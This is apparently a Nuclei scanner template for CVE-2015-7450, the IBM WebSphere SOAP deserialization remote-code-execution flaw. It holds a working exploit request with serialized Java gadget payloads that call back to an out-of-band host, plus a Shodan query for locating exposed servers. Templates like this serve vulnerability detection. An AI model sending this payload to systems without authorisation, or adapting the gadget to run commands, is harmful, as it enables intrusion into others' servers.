id: CVE-2015-7450 info: name: IBM WebSphere Java Object Deserialization - Remote Code Execution author: wdahlenb severity: critical description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). impact: | Successful exploitation of this vulnerability can lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by IBM to mitigate this vulnerability. reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 - http://www-01.ibm.com/support/docview.wss?uid=swg21970575 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.97122 epss-percentile: 0.99772 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibm product: tivoli_common_reporting shodan-query: http.html:"IBM WebSphere Portal" tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 SOAPAction: "urn:AdminService" rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== getUnsavedChanges {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= matchers-condition: and matchers: - type: word words: - 'SOAP-ENV:Server' - '' condition: and - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: status status: - 500 # digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950